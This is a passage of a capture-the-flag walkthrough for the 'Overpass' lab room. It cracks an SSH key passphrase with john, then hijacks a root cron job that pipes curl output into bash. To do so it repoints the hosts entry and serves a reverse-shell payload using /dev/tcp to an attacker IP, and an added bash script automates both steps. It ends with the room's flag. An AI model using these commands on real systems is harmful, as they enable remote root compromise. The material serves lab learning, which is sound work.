Next, use ssh2john.py to convert the passphrase-protected private key into a hash format that john can crack.
$ /usr/share/john/ssh2john.py rsa_key > hash_key
Let's now use john to crack the hash.
$ john hash_key
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
james13 (rsa_key)
1g 0:00:00:02 DONE 3/3 (2023-12-06 19:32) 0.4132g/s 585384p/s 585384c/s 585384C/s jamest1..james24
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ssh refuses to use a private key that other users can read, so restrict the file's permissions first (600 is the usual choice; 700 also passes the check, and sudo is not needed for a file we own).
$ chmod 600 rsa_key
We can now log in as james with rsa_key, entering the cracked passphrase james13 when prompted.
$ ssh -i rsa_key james@10.10.114.146
Enter passphrase for key 'rsa_key':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 6 14:06:09 UTC 2023
System load: 0.0 Processes: 88
Usage of /: 22.3% of 18.57GB Users logged in: 0
Memory usage: 12% IP address for eth0: 10.10.114.146
Swap usage: 0%
47 packages can be updated.
0 updates are security updates.
Last login: Sat Jun 27 04:45:40 2020 from 192.168.170.1
james@overpass-prod:~$
Task: Escalate your privileges and get the flag in root.txt
First, list the contents of james' home directory. There is a file called todo.txt there; let's see what is in it.
james@overpass-prod:~$ cat todo.txt
To Do:
> Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it actually works
> Ask Paradox how he got the automated build script working and where the builds go.
They're not updating on the website
The last item tells us there is an automated build script that is supposed to publish builds to the website, so something on this box is fetching and running it on a schedule. Cron is the obvious place to look.
james@overpass-prod:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
The last job runs every minute as root and pipes whatever overpass.thm serves at /downloads/src/buildscript.sh straight into bash, with no integrity check on the download. The hostname is resolved through /etc/hosts before DNS is consulted, so if we can change the address that overpass.thm maps to (check whether /etc/hosts is writable by james) to our own IP, root will fetch and execute a script we control.
Now we have to create the necessary directories inside /var/www/html/.
$ mkdir downloads
$ cd downloads
$ mkdir src
$ cd src
Now create a buildscript.sh file in that directory containing a reverse shell. The cron job pipes the download into bash, so bash's /dev/tcp redirection works even though the payload itself spawns sh:
sh -i >& /dev/tcp/10.17.48.138/9999 0>&1
Start (or restart) apache2 so the file is served at overpass.thm/downloads/src/buildscript.sh once the hostname points at us.
Finally, start a listener with nc. The job fires every minute, so within a minute root's curl fetches our script and a shell connects back:
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.114.146] 49412
sh: 0: can't access tty; job control turned off
#
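The hijack above has two halves: repointing the target's hosts entry and staging the payload at the exact path the cron job requests. The script below is an added example, not code from the original writeup or from the Overpass room; it wraps both halves in functions and runs them against a scratch directory so it can be tried offline. The attacker IP and port default to the values used on this page but come from environment variables; the hosts file path and web root are parameters (on the target you would pass /etc/hosts, on the attacker box /var/www/html), and the sample hosts file contents are constructed, since the target's real file is not shown on the page.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup: stage the cron hijack
# from the attacker side and repoint a hosts entry on the target side.
# Assumptions (not from the page): attacker IP/port come from the
# environment with this page's values as defaults; file paths are passed in.
set -eu

ATTACKER_IP="${ATTACKER_IP:-10.17.48.138}"
ATTACKER_PORT="${ATTACKER_PORT:-9999}"

# Payload line the cron job will execute. `curl ... | bash` runs it under
# bash, so the /dev/tcp redirection is available even though it spawns sh.
make_buildscript() {
    printf 'sh -i >& /dev/tcp/%s/%s 0>&1\n' "$1" "$2"
}

# Write the payload at the exact path the cron job requests, below web root $1,
# and print the resulting path.
stage_payload() {
    local webroot="$1" target
    target="$webroot/downloads/src/buildscript.sh"
    mkdir -p "$(dirname "$target")"
    make_buildscript "$ATTACKER_IP" "$ATTACKER_PORT" > "$target"
    chmod 644 "$target"        # the web server must be able to read it
    printf '%s\n' "$target"
}

# Print the address that hosts-format file $1 maps name $2 to (empty if absent).
resolve_in_hosts() {
    awk -v n="$2" '$1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == n) { print $1; exit } }' "$1"
}

# Replace every non-comment line in $1 that maps name $3 with "$2 $3".
# Writing back through cat keeps the file's owner and mode; mv would swap the inode.
repoint_host() {
    local hosts_file="$1" ip="$2" name="$3" tmp
    tmp="$(mktemp)"
    awk -v n="$name" '
        $1 ~ /^#/ { print; next }
        { for (i = 2; i <= NF; i++) if ($i == n) next; print }
    ' "$hosts_file" > "$tmp"
    printf '%s\t%s\n' "$ip" "$name" >> "$tmp"
    cat "$tmp" > "$hosts_file"
    rm -f "$tmp"
}

# Demo on constructed data in a scratch directory; nothing system-wide is touched.
demo() {
    local work hosts staged
    work="$(mktemp -d)"
    hosts="$work/hosts"
    # Constructed hosts file resembling the target's; the real one is not on the page.
    printf '127.0.0.1\tlocalhost\n127.0.1.1\toverpass-prod\n10.10.114.146\toverpass.thm\n' > "$hosts"
    echo "before: overpass.thm -> $(resolve_in_hosts "$hosts" overpass.thm)"
    repoint_host "$hosts" "$ATTACKER_IP" overpass.thm
    echo "after:  overpass.thm -> $(resolve_in_hosts "$hosts" overpass.thm)"
    staged="$(stage_payload "$work/www")"
    echo "staged payload at $staged:"
    cat "$staged"
    rm -rf "$work"
}

demo
```

Two practical points the functions encode: the hosts rewrite removes the live mapping but leaves comment lines alone, so a commented-out entry does not get mistaken for the real one, and the payload file is written with mode 644 so the web server can serve it. Because the job fires every minute, a fresh shell arrives each minute for as long as the entry points at you; once you have what you need, put the original mapping back so the box behaves as before.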
The # prompt shows we landed as root. Let's list the directory and read root.txt.
# ls
buildStatus
builds
go
root.txt
src
# cat root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}